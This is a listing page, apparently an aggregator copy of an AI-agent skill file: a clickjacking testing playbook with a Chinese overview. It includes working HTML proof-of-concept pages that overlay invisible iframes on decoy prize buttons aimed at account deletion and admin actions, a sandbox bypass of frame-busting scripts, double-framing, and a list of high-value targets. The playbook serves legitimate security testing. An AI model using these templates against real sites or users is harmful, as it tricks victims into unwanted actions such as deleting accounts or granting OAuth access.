Clickjacking

yaklang/hack-skills/skills/clickjacking

作者 yaklang6fbf0bc8d5c7無授權條款2.4K 個星標收錄於 2026年10月8日更新於 2026年10月8日儲存庫3 週前更新

Clickjacking playbook. Use when testing whether target pages can be framed, whether X-Frame-Options or CSP frame-ancestors are properly configured, and whether UI redress attacks can trigger sensitive actions.

僅含說明Security
AI 產生的概覽

一份點擊劫持測試手冊,涵蓋可被嵌入框架的檢查、繞過技巧與概念驗證範本。

功能
此技能提供一套結構化手冊,用來測試目標網頁是否可被嵌入框架,因而存在點擊劫持(介面偽裝)風險。它說明如何檢查 X-Frame-Options 與 CSP frame-ancestors 回應標頭、如何建構單擊、多步與拖放式概念驗證頁面,以及如何嘗試例如以 sandbox 屬性繞過防框架指令碼等手法。它也列出高價值目標與測試清單。
適用情境
適用於評估網站頁面能否被嵌入 iframe,以及介面偽裝攻擊是否可能觸發敏感操作。適合針對回應標頭設定與點擊劫持暴露面的安全測試,涵蓋已驗證與未驗證頁面。
執行需求
不隨附指令碼,僅為說明性內容。測試需要能託管或提供 HTML 概念驗證頁面,並使用瀏覽器對目標載入這些頁面。

SKILL: Clickjacking — Expert Attack Playbook

AI LOAD INSTRUCTION: Clickjacking (UI redress) techniques. Covers iframe transparency tricks, X-Frame-Options bypass, CSP frame-ancestors, multi-step clickjacking, drag-and-drop attacks, and chaining with other vulnerabilities. Often a "low severity" finding that becomes critical when targeting admin actions.

1. CORE CONCEPT

Clickjacking loads a target page in a transparent iframe overlaid on an attacker's page. The victim sees the attacker's UI but clicks on the invisible target page, performing unintended actions.

html
<style>  iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; opacity: 0.0001; z-index: 2; }  .decoy { position: absolute; top: 200px; left: 100px; z-index: 1; }</style><div class="decoy"><button>Click to win a prize!</button></div><iframe src="https://target.com/account/delete?confirm=yes"></iframe>

2. DETECTION — IS THE PAGE FRAMEABLE?

Check X-Frame-Options Header

X-Frame-Options: DENY           → cannot be framed (secure)X-Frame-Options: SAMEORIGIN     → only same-origin framing (secure for cross-origin)X-Frame-Options: ALLOW-FROM uri → deprecated, browser support inconsistent(header absent)                  → frameable! (vulnerable)

Check CSP frame-ancestors

Content-Security-Policy: frame-ancestors 'none'        → cannot be framedContent-Security-Policy: frame-ancestors 'self'         → same-origin onlyContent-Security-Policy: frame-ancestors https://a.com  → specific origin(directive absent)                                       → frameable

CSP frame-ancestors supersedes X-Frame-Options in modern browsers.

Quick PoC Test

html
<iframe src="https://target.com/sensitive-action" width="800" height="600"></iframe>

If the page loads in the iframe → frameable → potentially vulnerable.

JavaScript Frame Detection (from target page source)

javascript
// Common frame-busting code found in target pages:if (top.location.hostname !== self.location.hostname) {    top.location.href = self.location.href;}

If this code is present but not using CSP frame-ancestors, it can often be bypassed.


3. PROOF OF CONCEPT TEMPLATES

Basic Single-Click

html
<html><head><title>Free Prize</title></head><body><h1>Click the button to claim your prize!</h1><style>  iframe { position: absolute; top: 300px; left: 60px;           width: 500px; height: 200px; opacity: 0.0001; z-index: 2; }</style><iframe src="https://target.com/account/settings?action=delete"></iframe></body></html>

Multi-Step Clickjacking

For actions requiring multiple clicks (e.g., "Are you sure?" confirmation):

html
<div id="step1">  <button onclick="document.getElementById('step1').style.display='none';                    document.getElementById('step2').style.display='block';">    Step 1: Click here  </button></div><div id="step2" style="display:none">  <button>Step 2: Confirm</button></div><iframe src="https://target.com/admin/action"></iframe>

Reposition iframe for each step to align the transparent button with the decoy.

Drag-and-Drop Clickjacking

Extract data from one iframe to another using HTML5 drag-and-drop events — the victim drags across invisible iframes, transferring tokens or data.


4. BYPASS TECHNIQUES

Frame-Busting Script Bypass

Some pages use JavaScript frame-busting:

javascript
if (top !== self) { top.location = self.location; }

Bypass with sandbox attribute:

html
<iframe src="https://target.com" sandbox="allow-forms allow-scripts"></iframe><!-- sandbox without allow-top-navigation prevents frame-busting -->

X-Frame-Options ALLOW-FROM Bypass

ALLOW-FROM is not supported in Chrome/Safari. If the server relies solely on ALLOW-FROM, modern browsers ignore it → page is frameable.

Double-Framing

If X-Frame-Options: SAMEORIGIN is set, but a same-origin page exists that can be framed (without XFO), use that page as an intermediary to frame the target.


5. HIGH-IMPACT TARGETS

text
Account deletion pageEmail/password change formAdmin panel actions (add user, change role)Payment confirmationOAuth authorization ("Allow" button)Two-factor authentication disableAPI key generationWebhook configuration

6. TESTING CHECKLIST

□ Check X-Frame-Options header on sensitive pages□ Check CSP frame-ancestors directive□ Create iframe PoC and verify page loads□ Test frame-busting scripts — try sandbox attribute bypass□ Identify high-value single-click actions□ For multi-step actions, build multi-click PoC□ Test both authenticated and unauthenticated pages□ Verify ALLOW-FROM behavior across browsers

來源與署名

來源:yaklang/hack-skills位於skills/clickjacking提交6fbf0bc

授權條款: 無授權條款

內容歸原作者所有。SourceWeft 從公開儲存庫中收錄這些內容。

檢舉或申請下架